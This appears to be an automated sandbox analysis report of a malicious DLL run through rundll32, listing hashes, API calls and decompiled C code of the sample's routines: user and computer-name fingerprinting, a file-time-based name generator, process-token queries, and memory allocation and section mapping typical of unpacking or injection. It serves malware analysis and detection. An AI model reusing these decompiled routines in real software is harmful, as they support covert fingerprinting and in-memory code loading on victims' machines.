Source File: 00000000.00000002.909995385.000000006D490000.00000020.00020000.sdmp, Offset: 6D490000, based on PE: false

Similarity

API ID: _realloc
String ID:
API String ID: 1750794848-0
Opcode ID: 6c93915bcfa9a75ff5b094a40c617c11b7f6c72d845d652a0226990594a4fbdd
Instruction ID: f6a92f4a35915f3fccea1133e43a1cf19909493f045af0c506cfec6f7849dd2f
Opcode Fuzzy Hash: 6c93915bcfa9a75ff5b094a40c617c11b7f6c72d845d652a0226990594a4fbdd
Instruction Fuzzy Hash: 69B1A0B46087059FC314CF28C880A26BBF1FF9A204F5486ADD59A87711E731ED46CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BCE60, Relevance: 6.2, APIs: 4, Instructions: 176COMMON

Download Yara Rule

APIs

_realloc.LIBCMT ref: 6D4BCEFD
_realloc.LIBCMT ref: 6D4BCF3E
_realloc.LIBCMT ref: 6D4BCF81
_realloc.LIBCMT ref: 6D4BCFC3

Memory Dump Source

Source File: 00000000.00000002.909995385.000000006D490000.00000020.00020000.sdmp, Offset: 6D490000, based on PE: false

Similarity

API ID: _realloc
String ID:
API String ID: 1750794848-0
Opcode ID: f016abb8cfb33c754151cff0e7ad3af76a70dce89f01932e5d6cea4e4b358287
Instruction ID: 3bd23232e9648252017c6c6b12b2463bafb8aadf2d6c95a0afce9228d50ea0e9
Opcode Fuzzy Hash: f016abb8cfb33c754151cff0e7ad3af76a70dce89f01932e5d6cea4e4b358287
Instruction Fuzzy Hash: 4171E4B1A04B058FC360CF29C480916FBF1FF99314B518A6EE48A87A51E771F946CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C1585, Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6D4C159F

Part of subcall function 6D4C0234: __FF_MSGBANNER.LIBCMT ref: 6D4C0257
Part of subcall function 6D4C0234: __NMSG_WRITE.LIBCMT ref: 6D4C025E

std::bad_alloc::bad_alloc.LIBCMT ref: 6D4C15C2

Part of subcall function 6D4C151B: std::exception::exception.LIBCMT ref: 6D4C1527

std::bad_exception::bad_exception.LIBCMT ref: 6D4C15D6
__CxxThrowException@8.LIBCMT ref: 6D4C15E4

Memory Dump Source

Source File: 00000000.00000002.909995385.000000006D490000.00000020.00020000.sdmp, Offset: 6D490000, based on PE: false

Similarity

API ID: Exception@8Throw_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1802512180-0
Opcode ID: 15ad59294c2aaa98c2661b251fe2d09df1dc8916957ca5a0aeaa9f183e296139
Instruction ID: 489270ce6b65dd6dd2012b2d865fc6c452bf6188fda722c51cf59c355964933a
Opcode Fuzzy Hash: 15ad59294c2aaa98c2661b251fe2d09df1dc8916957ca5a0aeaa9f183e296139
Instruction Fuzzy Hash: C1F0202D80820666DF08FB20DC01E7D3B788B0135CF2200ADEA1E56291EF30AE42CAC3

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C3FEC, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6D4C3FF8

Part of subcall function 6D4C3307: __getptd_noexit.LIBCMT ref: 6D4C330A
Part of subcall function 6D4C3307: __amsg_exit.LIBCMT ref: 6D4C3317

__getptd.LIBCMT ref: 6D4C400F
__amsg_exit.LIBCMT ref: 6D4C401D
__lock.LIBCMT ref: 6D4C402D

Memory Dump Source

Source File: 00000000.00000002.909995385.000000006D490000.00000020.00020000.sdmp, Offset: 6D490000, based on PE: false

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: c72e7ab8889b95298e52dae78af93ab7125839db084c83f24f7eee1bc7902ffb
Instruction ID: 3ace2e383f8cf0a3afb5e521f8524ccc15b7779d48ba6974702d38e19e1d7c29
Opcode Fuzzy Hash: c72e7ab8889b95298e52dae78af93ab7125839db084c83f24f7eee1bc7902ffb
Instruction Fuzzy Hash: 90F06D3AA887019ADB20EBB5C248F5A76B0AF44359F12411DD6186B6E0CB70AD01CBD3

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C4CF1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6D4C4D00

Part of subcall function 6D4C3307: __getptd_noexit.LIBCMT ref: 6D4C330A
Part of subcall function 6D4C3307: __amsg_exit.LIBCMT ref: 6D4C3317

__getptd.LIBCMT ref: 6D4C4D0E

Strings

csm, xrefs: 6D4C4D1C

Memory Dump Source

Source File: 00000000.00000002.909995385.000000006D490000.00000020.00020000.sdmp, Offset: 6D490000, based on PE: false

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: a4b17a500ebba1ed6a596262de820ffb3c0123df75e8d6968bfa6170fe19f764
Instruction ID: 89e6f72b152a0c2a6948cf2831e62a0e0b81a03eec9ce7ed163a707ed80e5603
Opcode Fuzzy Hash: a4b17a500ebba1ed6a596262de820ffb3c0123df75e8d6968bfa6170fe19f764
Instruction Fuzzy Hash: 10014F38804346CACB34DF60C544FACB7B5AF49255F64491DE05956760EB30EE80CB42

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6960 Parent PID: 6936 rundll32.exeCOMMON

Executed Functions

Function 02C84C3B, Relevance: 34.7, APIs: 23, Instructions: 222
memoryfiletimeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E02C84C3B(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x2c8d2a0; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0x2c8d238, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x2c8d2a0; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0x2c8d238, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x2c8d238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x2c8d2a0; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0x2c8d2a4; // 0x245a5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x2c8e7f2; // 0x73797325
				_t83 = E02C8903C(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0x2c8d238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x2c8d2a4; // 0x245a5a8
				_t16 = _t93 + 0x2c8e813; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}

0x02c84c44
0x02c84c4a
0x02c84c4c
0x02c84c66
0x02c84c68
0x02c84c6d
0x02c84ee2
0x02c84ee9
0x02c84ee9
0x02c84c73
0x02c84c88
0x02c84c8a
0x02c84c8c
0x02c84c91
0x02c84ed2
0x02c84edc
0x00000000
0x02c84edc
0x02c84c97
0x02c84ca2
0x02c84ca7
0x02c84cac
0x02c84caf
0x02c84cb6
0x02c84cbb
0x02c84cc0
0x02c84ec2
0x02c84ecc
0x00000000
0x02c84ecc
0x02c84cd6
0x02c84cda
0x02c84cdd
0x02c84ce0
0x02c84ce6
0x02c84ceb
0x02c84cf4
0x02c84cfa
0x02c84d04
0x02c84d0b
0x02c84d0b
0x02c84d1d
0x02c84d28
0x02c84d36
0x02c84d3b
0x02c84d40
0x02c84d43
0x02c84d48
0x02c84d52
0x02c84d55
0x02c84d58
0x02c84d6e
0x02c84d70
0x02c84d75
0x02c84ec0
0x00000000
0x02c84ec0
0x02c84d8c
0x02c84ddd
0x02c84da0
0x02c84da8
0x02c84dad
0x02c84dbb
0x02c84dc4
0x02c84dcd
0x02c84dcd
0x02c84ddb
0x02c84ddb
0x02c84de1
0x02c84de5
0x02c84de5
0x02c84deb
0x00000000
0x00000000
0x02c84ded
0x02c84df3
0x02c84e9a
0x02c84e9d
0x02c84eaa
0x02c84eaa
0x02c84eae
0x00000000
0x00000000
0x02c84ea3
0x02c84ea7
0x02c84ea7
0x02c84ea9
0x02c84ea9
0x02c84eb3
0x02c84eba
0x02c84ebc
0x00000000
0x02c84ebc
0x02c84df9
0x02c84dfb
0x02c84dfb
0x02c84e0e
0x02c84e14
0x02c84e1f
0x02c84e21
0x02c84e25
0x02c84e27
0x02c84e27
0x02c84e2c
0x02c84e2e
0x02c84e2e
0x02c84e2c
0x02c84e33
0x02c84e37
0x02c84e37
0x02c84e47
0x02c84e4c
0x02c84e4f
0x02c84e4f
0x02c84e52
0x02c84e5c
0x02c84e64
0x02c84e69
0x02c84e77
0x02c84e77
0x02c84e8b
0x02c84e8f
0x02c84e8f

APIs

RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 02C84C66
RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 02C84C88
memset.NTDLL ref: 02C84CA2

Part of subcall function 02C8903C: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,02C85D90,63699BCE,02C84CBB,73797325), ref: 02C8904D
Part of subcall function 02C8903C: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02C89067

CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 02C84CE0
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02C84CF4
FindCloseChangeNotification.KERNELBASE(00000000), ref: 02C84D0B
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 02C84D17
lstrcat.KERNEL32(?,642E2A5C), ref: 02C84D58
FindFirstFileA.KERNELBASE(?,?), ref: 02C84D6E
CompareFileTime.KERNEL32(?,?), ref: 02C84D8C
FindNextFileA.KERNELBASE(02C841AA,?), ref: 02C84DA0
FindClose.KERNEL32(02C841AA), ref: 02C84DAD
FindFirstFileA.KERNEL32(?,?), ref: 02C84DB9
CompareFileTime.KERNEL32(?,?), ref: 02C84DDB
StrChrA.SHLWAPI(?,0000002E), ref: 02C84E0E
memcpy.NTDLL(00000000,?,00000000), ref: 02C84E47
FindNextFileA.KERNELBASE(02C841AA,?), ref: 02C84E5C
FindClose.KERNEL32(02C841AA), ref: 02C84E69
FindFirstFileA.KERNEL32(?,?), ref: 02C84E75
CompareFileTime.KERNEL32(?,?), ref: 02C84E85
FindClose.KERNELBASE(02C841AA), ref: 02C84EBA
HeapFree.KERNEL32(00000000,00000000,73797325), ref: 02C84ECC
HeapFree.KERNEL32(00000000,?), ref: 02C84EDC

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
String ID:
API String ID: 2944988578-0
Opcode ID: d051ea0f8750572318be1f58de587ebe29ffe44b7b846f123db1e142addebe06
Instruction ID: f84108e5ff196c2e2d50e657752ed0dc1a66bc3e27bb06ea792b3ab6e293bc5d
Opcode Fuzzy Hash: d051ea0f8750572318be1f58de587ebe29ffe44b7b846f123db1e142addebe06
Instruction Fuzzy Hash: 88814A72D0015AAFDB25AFA5DC84BEEBBB9FF44304F11856AE501E6250E7309A54CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6D4F5770, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,000007D1,00003000,00000040,000007D1,6D4F51C8), ref: 6D4F582D
VirtualAlloc.KERNEL32(00000000,00000059,00003000,00000040,6D4F5229), ref: 6D4F5864
VirtualAlloc.KERNEL32(00000000,00016DD9,00003000,00000040), ref: 6D4F58C4
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6D4F58FA
VirtualProtect.KERNEL32(6D480000,00000000,00000004,6D4F574F), ref: 6D4F59FF
VirtualProtect.KERNEL32(6D480000,00001000,00000004,6D4F574F), ref: 6D4F5A26
VirtualProtect.KERNEL32(00000000,?,00000002,6D4F574F), ref: 6D4F5AF3
VirtualProtect.KERNEL32(00000000,?,00000002,6D4F574F,?), ref: 6D4F5B49
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6D4F5B65

Memory Dump Source

Source File: 00000003.00000002.911466820.000000006D4F5000.00000040.00020000.sdmp, Offset: 6D4F5000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 25725fe3ea5edefb74e8182b314af060065adca4d4aa0626c8a3a422ebf314a2
Instruction ID: f76783f284efcf437e2985aabff377be92238d9e6f25f203477de718fe0d538d
Opcode Fuzzy Hash: 25725fe3ea5edefb74e8182b314af060065adca4d4aa0626c8a3a422ebf314a2
Instruction Fuzzy Hash: 77D19FB25046019FEB25CF04C880F6177B5FF98314B19A198ED5D9F76ADB30A821CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 02C82D6E, Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E02C82D6E(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x2c8d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E02C8427C( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x2c8d2a0 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x2c8d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E02C846F9(_v8 + _v8, _t64);
							}
							HeapFree( *0x2c8d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x2c8d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E02C846F9(_v8 + _v8, _t64);
						}
						HeapFree( *0x2c8d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x02c82d6e
0x02c82d76
0x02c82d7a
0x02c82d7d
0x02c82d82
0x02c82d84
0x02c82d89
0x02c82d89
0x02c82d8f
0x02c82d91
0x02c82d9e
0x02c82dff
0x02c82da0
0x02c82da5
0x02c82dab
0x02c82db0
0x02c82dbe
0x02c82dc2
0x02c82dd1
0x02c82dd8
0x02c82ddf
0x02c82ddf
0x02c82dea
0x02c82dea
0x02c82dc2
0x02c82db0
0x02c82e01
0x02c82e07
0x02c82e11
0x02c82e13
0x02c82e18
0x02c82e27
0x02c82e2b
0x02c82e36
0x02c82e3d
0x02c82e44
0x02c82e44
0x02c82e50
0x02c82e50
0x02c82e2b
0x02c82e5b
0x02c82e5d
0x02c82e60
0x02c82e62
0x02c82e65
0x02c82e68
0x02c82e72
0x02c82e76
0x02c82e7a

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 02C82DA5
RtlAllocateHeap.NTDLL(00000000,?), ref: 02C82DBC
GetUserNameW.ADVAPI32(00000000,?), ref: 02C82DC9
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,02C85D80), ref: 02C82DEA
GetComputerNameW.KERNEL32(00000000,00000000), ref: 02C82E11
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02C82E25
GetComputerNameW.KERNEL32(00000000,00000000), ref: 02C82E32
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,02C85D80), ref: 02C82E50

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: 81d07133762ee37bd8d68a733380656533d61b039e283f3ed573a9244bbec489
Instruction ID: dc9b45d284740ff1f4ad812de486d9b22fb5ab4d2a5fbbf78eec9c016a56bb0f
Opcode Fuzzy Hash: 81d07133762ee37bd8d68a733380656533d61b039e283f3ed573a9244bbec489
Instruction Fuzzy Hash: A0316A72A40205EFDB14EFB8CC84B6EB7F9FB44308B10852AE905D7250E730EE119B51

Uniqueness

Uniqueness Score: -1.00%

Function 02C81168, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E02C81168(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E02C87E20(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E02C8A5FA(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x02c81175
0x02c81176
0x02c81177
0x02c81178
0x02c81179
0x02c8117d
0x02c81184
0x02c81193
0x02c81196
0x02c81199
0x02c811a0
0x02c811a3
0x02c811a6
0x02c811a9
0x02c811ac
0x02c811b7
0x02c811b9
0x02c811c2
0x02c811ca
0x02c811cc
0x02c811de
0x02c811e8
0x02c811ec
0x02c811fb
0x02c811ff
0x02c81208
0x02c81210
0x02c81210
0x02c81212
0x02c81212
0x02c8121a
0x02c81220
0x02c81224
0x02c81224
0x02c8122f

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 02C811AF
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 02C811C2
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02C811DE

Part of subcall function 02C87E20: RtlAllocateHeap.NTDLL(00000000,00000000,02C88112), ref: 02C87E2C

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02C811FB
memcpy.NTDLL(00000000,00000000,0000001C), ref: 02C81208
NtClose.NTDLL(?), ref: 02C8121A
NtClose.NTDLL(00000000), ref: 02C81224

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 8ff4ea1197064b73d83dabf20de11ce0aab9d53d11a4318f5ef5d0bab9d50e20
Instruction ID: fd9575a134ececf18074ba777513868f7ef8e55c81959be4d7b11e21b8d65fb7
Opcode Fuzzy Hash: 8ff4ea1197064b73d83dabf20de11ce0aab9d53d11a4318f5ef5d0bab9d50e20
Instruction Fuzzy Hash: 7A211672940218BBDB01EFA4DC84AEEBFBDEF18754F108026F905E6110D7B19B55AFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4815F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D4815F1(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E6D481F14(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x6d4815fa
0x6d481601
0x6d481602
0x6d481603
0x6d481604
0x6d481605
0x6d481616
0x6d48161a
0x6d48162e
0x6d481631
0x6d481634
0x6d48163b
0x6d48163e
0x6d481645
0x6d481648
0x6d48164b
0x6d48164e
0x6d481653
0x6d48168e
0x6d481655
0x6d481658
0x6d48165e
0x6d481663
0x6d481667
0x6d481685
0x6d481669
0x6d481670
0x6d48167e
0x6d48167e
0x6d481667
0x6d481696

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,?), ref: 6D48164E

Part of subcall function 6D481F14: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6D481663,00000002,00000000,?,?,00000000,?,?,6D481663,00000002), ref: 6D481F41

memset.NTDLL ref: 6D481670

Strings

@, xrefs: 6D48163E

Memory Dump Source

Source File: 00000003.00000002.911231394.000000006D481000.00000020.00020000.sdmp, Offset: 6D480000, based on PE: true

Associated: 00000003.00000002.911197345.000000006D480000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.911269546.000000006D483000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.911283029.000000006D485000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.911308923.000000006D486000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 39e720e2c94793e4bf624767ebfb882cd87e7a4b170212c2c62006b4db7c7316
Instruction ID: 9244c6ea6644f03e10e0555ca7fa786fc5f5a6ff78544260d5992a58a8f69de5
Opcode Fuzzy Hash: 39e720e2c94793e4bf624767ebfb882cd87e7a4b170212c2c62006b4db7c7316
Instruction Fuzzy Hash: FD210BB1D00209AFDB01CFA9C8849DEFBB9FB48354F14842AE656F3210D730AE458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 6D481F14, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6D481F14(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x6d481f26
0x6d481f2c
0x6d481f3a
0x6d481f41
0x6d481f46
0x6d481f4c
0x00000000
0x6d481f4d
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6D481663,00000002,00000000,?,?,00000000,?,?,6D481663,00000002), ref: 6D481F41

Memory Dump Source

Source File: 00000003.00000002.911231394.000000006D481000.00000020.00020000.sdmp, Offset: 6D480000, based on PE: true

Associated: 00000003.00000002.911197345.000000006D480000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.911269546.000000006D483000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.911283029.000000006D485000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.911308923.000000006D486000.00000002.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: afea0323221498d3dbe89d42d820fbc2e631c8ac0f874e65849bf40aa133378e
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: BDF012B590420CFFEB119FA5CC85C9FBBBDEB44394B10497AF252E1091D7309E088A60

Uniqueness

